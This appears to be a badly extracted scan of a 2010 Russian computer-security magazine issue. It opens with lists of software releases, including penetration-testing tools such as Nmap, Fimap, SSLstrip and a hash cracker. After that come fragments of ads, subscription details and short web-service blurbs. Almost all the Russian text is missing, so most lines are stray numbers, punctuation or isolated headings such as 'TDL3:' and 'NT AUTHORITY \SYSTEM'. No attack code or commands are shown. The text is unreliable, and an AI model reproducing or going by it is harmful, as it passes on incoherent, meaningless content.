Easystroke 0.4.11
EasyTag 2.1
Emelfm2 0.7.1
File Roller 2.24.3
Gimp 2.6.8
GNOME Do 0.8.2
Inkscape 0.47
Istanbul 0.2.2
LMMS 0.4.6
Metamorphose 1.1.2
Meteorite 0.10 Beta
QtiPlot 0.9.7.11
Unison 2.32.52
VLC 1.0.4
Wink 1.5

>X-Distr
BackTrack 4
Frenzy 1.2

>System
AMD Catalyst 10.1
AWStats 6.95
Bacula 5
Diskman 0.9.7
Gzip 1.4
Linux Bluetooth Remote Control
0.8.6
Linux Kernel 2.6.32.7
Lm-sensors 3.1.1
NTFS-3G 2010.01.16
NVClock 0.8
nVidia 190.53
PackageKit 0.6
QEMU 0.12.2
Rovclock 0.6e
Ubuntu Tweak 0.5
VirtualBox 3.1.2
Wine 1.1.37

>Server
ADCH++ 2.4
Apache 2.2.14
Apache Tomcat 6.0.24
BIND 9.6.1-P3
CUPS 1.4.2
DHCP 4.1.1
IMAPFilter 2.2.2
MySecureShell 1.15
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.6.5
PostgreSQL 8.4.2
Samba 3.4.5
Sendmail 8.14.4
Snort 2.8.5.2
Squid 3.0 STABLE21
Stunnel 4.30
Tinyproxy 1.8.0

Clamav sniffer 0.7


Dirb 2.03
Distributed Hash Cracker 3
Fakeroute 0.3
Fierce Domain Scan
Fimap 0.7 alpha
Firewalk 5.0
Ngrep 1.45
Nmap 5.21
Onesixtyone 0.3.2
Porkbind 1.3
PulledPork 0.3.4
SPIKE Proxy
SSLstrip 0.7
Tor 0.2.1.22
Tor-ramdisk
WAFP 0.01
Wireshark 1.2.6
Yasat 207

03(134) 2010

. 28

. 32

NT AUTHORITY \SYSTEM

WINDOWS

USERLEVEL!

03 (134) 2010



: 2
10
.



ASTERISK
. 119

. 48

. 94

KDE 4

. 54

7
KDE

TDL3:

! 660 . !

8.5
DVD

2100 .

175 . , 23% (230


. )

. ,

24

12

3720


+ + DVD:
- 155
( 35% , )

2100

!




,


,
:

+CD

Smoke

Total DVD+DVD

+DVD

DVDXpert

+2DVD

Digital Photo

11 46 2009


30

31

31

T3.

+2DVD

170 p.

PES
10


www.totalfootb

Ski Pass

Mountin Bike

ONBOARD

Total Football+DVD


!!!

1. , ,
shop.glc.ru.
2. .
3. :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

C

,
.
, ,
.
DVD

2100 12 +
1200. 6 .

( )

! 8(495)780-88-29
( ) 8(800)200-3-999 ( , ,
). , /

: info@glc.ru


!


72 000 QIWI ()
.

UNITS

HTTP:// WWW2

prostopleer.com

, , -,
, , -, (
), . (
) , -
- . -,
. !

IT-

ping
traceroute

WIPMANIA

www.wipmania.com
, , - -
, justping.com,
( , , ).
: WIPmania .
traceroute, whois DNS.
Firefox, WIPmania API.

IT-EVENT

ALGORITHMATIC

,
, ,
,
IT. IT-Event (, ),
IT- , . , ,
, , !

, ,
, ,
. , ,
Silverlight, . Algorithmatic
, .

it-event.ru

144

Algorithmatic

X 03 /134/ 10